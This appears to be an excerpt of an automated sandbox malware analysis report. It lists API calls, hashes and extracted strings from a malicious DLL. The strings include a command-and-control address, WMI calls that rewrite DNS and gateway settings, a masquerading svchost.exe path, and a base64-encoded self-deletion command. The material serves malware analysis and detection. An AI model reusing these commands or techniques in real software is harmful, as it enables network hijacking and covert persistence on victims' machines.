                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007338
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 1000734D
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007368
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10007377
                                                                                                                                              • Part of subcall function 10007A62: VariantInit.OLEAUT32(?), ref: 10007AA1
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007505
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10007513
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                            • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=)u
                                                                                                                                            • API String ID: 2640012081-3999083044
                                                                                                                                            • Opcode ID: 12229ab9ea9be2b5515b3a4e7304c5cbd28c893a32b3e86cd77fead74930fbe5
                                                                                                                                            • Instruction ID: ecf29a1c47d91b81846b45f5da98bbb69cd4e5f42de0d6ad34227a81938465a8
                                                                                                                                            • Opcode Fuzzy Hash: 12229ab9ea9be2b5515b3a4e7304c5cbd28c893a32b3e86cd77fead74930fbe5
                                                                                                                                            • Instruction Fuzzy Hash: DAD17E70D00209EFEB15CFA4C8809EEBBB8FF49780F104419F419AB259DB75AA45CFA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf
                                                                                                                                            • String ID: %s\%s$%s\version.txt$12010043$12010043$C:\Users\user\Desktop$C:\Users\user\Desktop\12010043$C:\Users\user\Desktop\QCTYoyX422.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB570DC9$M%s$Mhost123.zz.am:6658$host123.zz.am:6658
                                                                                                                                            • API String ID: 2111968516-2931517777
                                                                                                                                            • Opcode ID: 857beac2df9e912fa28a8a8c5910c135d4b4ee4941f056ece51d960c3556155a
                                                                                                                                            • Instruction ID: 32e0762688fea209a997a92a9e142d3ada4c65c650573aee4fc5e34dd7d3b294
                                                                                                                                            • Opcode Fuzzy Hash: 857beac2df9e912fa28a8a8c5910c135d4b4ee4941f056ece51d960c3556155a
                                                                                                                                            • Instruction Fuzzy Hash: 961159356007197BF210E7919C45F5F7E9CDF896A6F01021DFB01AE181DB76F9818A72
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004EC5
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004ECB
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004ED1
                                                                                                                                            • VariantInit.OLEAUT32(?,?,?,?,?,?,?,?,?,10016AD0,00000000,00080000), ref: 10005009
                                                                                                                                            • VariantInit.OLEAUT32(?,?,?,?,?,?,?,?,?,10016AD0,00000000,00080000), ref: 1000500F
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=)u$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                            • API String ID: 1927566239-2636284693
                                                                                                                                            • Opcode ID: b6f3bf19f9a655f11ce33ea3d1eef9f97ff5ff13253a98ebad0314bfa4936779
                                                                                                                                            • Instruction ID: f681daf1cfe066dfb2c65bb1802d225618d831e3fba353d21c944956626e3e16
                                                                                                                                            • Opcode Fuzzy Hash: b6f3bf19f9a655f11ce33ea3d1eef9f97ff5ff13253a98ebad0314bfa4936779
                                                                                                                                            • Instruction Fuzzy Hash: 23A159B1900209AFEB04DFA4CC81DEEBBBDEF48394F104569F515AB295DB31AE45CB60
                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 1000574F
                                                                                                                                            • wsprintfA.USER32 ref: 100057B1
                                                                                                                                            • wsprintfA.USER32 ref: 100057C5
                                                                                                                                            • PrintFile.QCTYOYX422(?,?,00000000,?,?,?,?,?,?,?,10016AD0,00000000,00080000,?,1000720C), ref: 100057E8
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000,00000000), ref: 10005835
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$CreateFilePrintThread
                                                                                                                                            • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                                                                                                            • API String ID: 1788855648-1421401311
                                                                                                                                            • Opcode ID: ae8518da5cd223e832b712c6548c98f9a89997a3f3d4d6029e7fac4c4bf50c1f
                                                                                                                                            • Instruction ID: 590dfccee83cd698aee2aff2a0aef7bd89598b4f0e32949fa848c193a7d694e7
                                                                                                                                            • Opcode Fuzzy Hash: ae8518da5cd223e832b712c6548c98f9a89997a3f3d4d6029e7fac4c4bf50c1f
                                                                                                                                            • Instruction Fuzzy Hash: 0531EA72910238BBEB21D7A4CC45FCF7B6CEB08356F0404A6F708FA051DB75AA858A91
                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 10005437
                                                                                                                                            • wsprintfA.USER32 ref: 1000549E
                                                                                                                                            • wsprintfA.USER32 ref: 100054BC
                                                                                                                                            • PrintFile.QCTYOYX422(?,?,10016594,?,00000000), ref: 100054DE
                                                                                                                                            • wsprintfA.USER32 ref: 10005582
                                                                                                                                            • Sleep.KERNEL32(000003E8,00000000,75A78400,?,40000000,00000001,00000000,00000002,00000000,00000000,7634C650,?,?,00000009,00000000,10016594), ref: 100055AE
                                                                                                                                            Strings
                                                                                                                                            • c:\windows\system32\drivers\%s, xrefs: 10005498
                                                                                                                                            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
                                                                                                                                            • %s\%s, xrefs: 10005431
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$FilePrintSleep
                                                                                                                                            • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$c:\windows\system32\drivers\%s
                                                                                                                                            • API String ID: 518940211-4228670124
                                                                                                                                            • Opcode ID: c361d524b353549e0f38205e8cfe1225c09218ba4335209976bd8a7148bd2516
                                                                                                                                            • Instruction ID: 3567043749f32881e03762bb9a57e308b600a04db8eea4acb5e64ce7ea9520bd
                                                                                                                                            • Opcode Fuzzy Hash: c361d524b353549e0f38205e8cfe1225c09218ba4335209976bd8a7148bd2516
                                                                                                                                            • Instruction Fuzzy Hash: 9751C272900658BFEB11CB68CC45FEE73ADEB48341F1404A5FA08AB191DBB1FE858B50
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(?,?,?,cmd.exe), ref: 100043A6
                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 100043E5
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
                                                                                                                                            • API String ID: 3472027048-2620343502
                                                                                                                                            • Opcode ID: 3f59aa8a2a531e52e96b689b157fed57f8b0b4aca2b36427f54941e0ecbe5060
                                                                                                                                            • Instruction ID: 2962837d3e63ffe82077fec71eea4cc39f059f6aab2461bdb2792d37a05628b4
                                                                                                                                            • Opcode Fuzzy Hash: 3f59aa8a2a531e52e96b689b157fed57f8b0b4aca2b36427f54941e0ecbe5060
                                                                                                                                            • Instruction Fuzzy Hash: 370126BA000394BAFB12BB74EC46F9E3B5CDF452E2F120016F9446D086CEB5AA804565
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000001,SeShutdownPrivilege,00000001,00000000,00000000,?,000000BC,00000000,?,000000BC,00000000,?,00000128,00000000), ref: 10005F21
                                                                                                                                              • Part of subcall function 10004126: OpenProcessToken.ADVAPI32(00000028,00000028,00000028,10005F32,00000000,00000028,00000000,00000001,SeShutdownPrivilege,00000001,00000000,00000000,?,000000BC,00000000,?), ref: 10004132
                                                                                                                                              • Part of subcall function 100040F1: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,00000000), ref: 100040FD
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10005F79
                                                                                                                                              • Part of subcall function 1000404F: AdjustTokenPrivileges.ADVAPI32(00000000,00000010,?,00000000,00000000,10005F7E,?,10005F7E,00000000,00000000,?,00000010,00000000,00000000), ref: 10004064
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessTimerToken$AdjustConcurrency::details::platform::__CreateCurrentFormatLookupOpenPrivilegePrivilegesQueueTimeValue___crt
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                            • API String ID: 3793502078-3123256004
                                                                                                                                            • Opcode ID: 4c2164c536502c8c7bf62064663df8d628c4358b27154a1aa27f72d12e264788
                                                                                                                                            • Instruction ID: ec7a4272703c46c275716bc18e38bfb45c62e376eb564a1a1e1e8047e794edd2
                                                                                                                                            • Opcode Fuzzy Hash: 4c2164c536502c8c7bf62064663df8d628c4358b27154a1aa27f72d12e264788
                                                                                                                                            • Instruction Fuzzy Hash: FE21BDB6D00119BEEB10DAA4CC02FEF7BBCDF04790F104021FA04E6185EA75AB809AE1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
                                                                                                                                            • API String ID: 1721638100-3849684823
                                                                                                                                            • Opcode ID: d1da8393b741fbea104cea0a346650b348cc7a6ae7d15635f455682e2727de3c
                                                                                                                                            • Instruction ID: d10eea2e68a17fc7dae01a0a692719cf89fcc4e95e635f9962b470bf74251c26
                                                                                                                                            • Opcode Fuzzy Hash: d1da8393b741fbea104cea0a346650b348cc7a6ae7d15635f455682e2727de3c
                                                                                                                                            • Instruction Fuzzy Hash: D81106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA72AFC44A60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
                                                                                                                                            • API String ID: 1721638100-2151592823
                                                                                                                                            • Opcode ID: 354cb08d00e8bc516f166db664e2c84127a23412515739fcecc10b8ce6ebd26b
                                                                                                                                            • Instruction ID: 275623b6bb4d38d455d16e038d1f67d5d5eba5b08857937f3fa6caa2442e2442
                                                                                                                                            • Opcode Fuzzy Hash: 354cb08d00e8bc516f166db664e2c84127a23412515739fcecc10b8ce6ebd26b
                                                                                                                                            • Instruction Fuzzy Hash: 131104769041197EFB21DAA4CC42FDB776CDB14384F0085B1FA48B6080EA71AF884660
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\Desktop, xrefs: 1000880B
                                                                                                                                            • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008810
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                            • API String ID: 1749205058-4198270437
                                                                                                                                            • Opcode ID: d826f062264427af496b9675ff0d63a37454a8e3147eb2671c5731483726d261
                                                                                                                                            • Instruction ID: cb8f3af107b47666e7401f40fe0349a9d09f1feb376e898973d7629cffdb37cc
                                                                                                                                            • Opcode Fuzzy Hash: d826f062264427af496b9675ff0d63a37454a8e3147eb2671c5731483726d261
                                                                                                                                            • Instruction Fuzzy Hash: 00F0AEF250019DABEB15CBA4CC857EA3768FF04285F040975F705F5051DBB19AC44A55
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID: $p=)u
                                                                                                                                            • API String ID: 1927566239-2710233430
                                                                                                                                            • Opcode ID: d0ca9816adfda9363097ead228823b8de7426d0966cf0e74972078de5e0d5c66
                                                                                                                                            • Instruction ID: ef89c2eb01536c9538a48ebd5608185a951f11054c82c4a53c762a0a2007c409
                                                                                                                                            • Opcode Fuzzy Hash: d0ca9816adfda9363097ead228823b8de7426d0966cf0e74972078de5e0d5c66
                                                                                                                                            • Instruction Fuzzy Hash: AB41A475D002599FEF14DFA4C884AEEB7F8FF05284F10446DE91AA3245DB38AE48CB61
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
                                                                                                                                              • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CBB,?,10005CBB,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateTimer$Concurrency::details::platform::__FileQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                            • API String ID: 3486561800-3123256004
                                                                                                                                            • Opcode ID: b1726d4115c593d66bb357bf89ab1e7ee1f9c93add6e05033f4287082a534528
                                                                                                                                            • Instruction ID: 2e9b22e8cb94d114ab57fa925500967999958ebf182bde47e5e7f2d31677baea
                                                                                                                                            • Opcode Fuzzy Hash: b1726d4115c593d66bb357bf89ab1e7ee1f9c93add6e05033f4287082a534528
                                                                                                                                            • Instruction Fuzzy Hash: 23E0687290112432E670D1669C07FCF3E9CDB857F4F000220B688E60C4DAB4AAC4C6E0